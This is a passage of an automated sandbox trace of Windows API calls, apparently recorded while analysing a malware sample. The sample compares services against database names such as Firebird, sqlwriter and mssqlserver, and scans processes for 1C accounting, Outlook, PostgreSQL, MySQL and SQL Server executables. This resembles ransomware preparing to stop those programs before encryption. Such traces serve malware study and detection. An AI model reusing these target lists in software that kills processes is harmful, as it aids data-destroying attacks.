(lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0040.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0040.646] lstrlenW (lpString="MpsSvc") returned 6 [0040.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0040.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0040.647] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0040.647] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0040.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0040.647] lstrlenW (lpString="Netman") returned 6 [0040.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0040.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0040.647] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0040.647] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0040.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0040.647] lstrlenW (lpString="netprofm") returned 8 [0040.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0040.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0040.647] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0040.647] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0040.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0040.647] lstrlenW (lpString="NlaSvc") returned 6 [0040.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0040.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0040.647] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0040.647] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0040.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0040.647] lstrlenW (lpString="nsi") returned 3 [0040.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0040.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0040.647] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0040.647] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0040.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0040.647] lstrlenW (lpString="PcaSvc") returned 6 [0040.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0040.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0040.647] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0040.647] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0040.647] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0040.647] lstrlenW (lpString="PlugPlay") returned 8 [0040.647] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0040.647] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0040.648] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0040.648] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0040.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0040.648] lstrlenW (lpString="Power") returned 5 [0040.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0040.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0040.648] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0040.648] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0040.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0040.648] lstrlenW (lpString="ProfSvc") returned 7 [0040.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0040.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0040.648] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0040.648] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0040.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0040.648] lstrlenW (lpString="RpcEptMapper") returned 12 [0040.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0040.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0040.648] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0040.648] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0040.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0040.648] lstrlenW (lpString="RpcSs") returned 5 [0040.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0040.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0040.648] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0040.648] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0040.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0040.648] lstrlenW (lpString="SamSs") returned 5 [0040.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0040.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0040.648] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0040.648] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0040.648] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0040.648] lstrlenW (lpString="Schedule") returned 8 [0040.648] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0040.648] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0040.649] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0040.649] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0040.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0040.649] lstrlenW (lpString="SENS") returned 4 [0040.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0040.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0040.649] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0040.649] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0040.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0040.649] lstrlenW (lpString="ShellHWDetection") returned 16 [0040.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0040.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0040.649] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0040.649] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0040.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0040.649] lstrlenW (lpString="Spooler") returned 7 [0040.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0040.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0040.649] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0040.649] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0040.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0040.649] lstrlenW (lpString="SysMain") returned 7 [0040.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0040.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0040.649] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0040.649] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0040.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0040.649] lstrlenW (lpString="Themes") returned 6 [0040.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0040.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0040.649] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0040.649] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0040.649] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0040.649] lstrlenW (lpString="TrkWks") returned 6 [0040.649] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0040.649] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0040.650] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0040.650] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0040.650] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0040.650] lstrlenW (lpString="UxSms") returned 5 [0040.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0040.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0040.650] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0040.650] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0040.650] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0040.650] lstrlenW (lpString="VSS") returned 3 [0040.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0040.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0040.650] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0040.650] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0040.650] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0040.650] lstrlenW (lpString="WdiServiceHost") returned 14 [0040.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0040.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0040.650] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0040.650] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0040.650] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0040.650] lstrlenW (lpString="WdiSystemHost") returned 13 [0040.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0040.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0040.650] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0040.650] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0040.650] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0040.650] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0040.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0040.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0040.650] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0040.650] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0040.650] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0040.650] lstrlenW (lpString="Winmgmt") returned 7 [0040.650] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0040.650] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0040.650] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0040.650] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0040.651] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0040.651] lstrlenW (lpString="WPDBusEnum") returned 10 [0040.651] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0040.651] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0040.651] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0040.651] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0040.651] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0040.651] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x403a508 | out: hHeap=0x570000) returned 1 [0040.651] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f8 [0040.653] Process32FirstW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0040.654] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0040.654] lstrlenW (lpString="System") returned 6 [0040.654] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0040.654] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0040.654] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0040.654] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0040.654] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0040.654] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0040.654] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0040.654] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0040.655] lstrlenW (lpString="smss.exe") returned 8 [0040.655] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0040.655] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0040.655] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0040.655] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0040.655] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0040.655] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0040.655] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0040.655] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0040.656] lstrlenW (lpString="csrss.exe") returned 9 [0040.656] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0040.656] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0040.656] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0040.656] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0040.656] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0040.656] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0040.656] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0040.656] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0040.657] lstrlenW (lpString="wininit.exe") returned 11 [0040.657] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0040.657] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0040.657] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0040.657] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0040.657] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0040.657] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0040.657] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0040.657] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0040.657] lstrlenW (lpString="csrss.exe") returned 9 [0040.658] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0040.658] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0040.658] lstrlenW (lpString="winlogon.exe") returned 12 [0040.658] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0040.659] lstrlenW (lpString="services.exe") returned 12 [0040.659] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0040.660] lstrlenW (lpString="lsass.exe") returned 9 [0040.660] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0040.660] lstrlenW (lpString="lsm.exe") returned 7 [0040.660] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.661] lstrlenW (lpString="svchost.exe") returned 11 [0040.661] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.662] lstrlenW (lpString="svchost.exe") returned 11 [0040.662] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.663] lstrlenW (lpString="svchost.exe") returned 11 [0040.663] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.663] lstrlenW (lpString="svchost.exe") returned 11 [0040.663] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.664] lstrlenW (lpString="svchost.exe") returned 11 [0040.664] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0040.665] lstrlenW (lpString="audiodg.exe") returned 11 [0040.665] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.665] lstrlenW (lpString="svchost.exe") returned 11 [0040.665] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.666] lstrlenW (lpString="svchost.exe") returned 11 [0040.666] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0040.667] lstrlenW (lpString="dwm.exe") returned 7 [0040.667] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0040.667] lstrlenW (lpString="explorer.exe") returned 12 [0040.667] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0040.668] lstrlenW (lpString="spoolsv.exe") returned 11 [0040.668] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0040.669] lstrlenW (lpString="taskhost.exe") returned 12 [0040.669] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0040.669] lstrlenW (lpString="svchost.exe") returned 11 [0040.669] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0040.670] lstrlenW (lpString="taskeng.exe") returned 11 [0040.670] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0040.671] lstrlenW (lpString="taskhost.exe") returned 12 [0040.671] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0040.671] lstrlenW (lpString="called.exe") returned 10 [0040.671] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0040.672] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0040.672] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0040.673] lstrlenW (lpString="analyst.exe") returned 11 [0040.673] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0040.673] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0040.673] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0040.674] lstrlenW (lpString="wages.exe") returned 9 [0040.674] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0040.675] lstrlenW (lpString="rand.exe") returned 8 [0040.675] Process32NextW (in: hSnapshot=0x1f8, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered 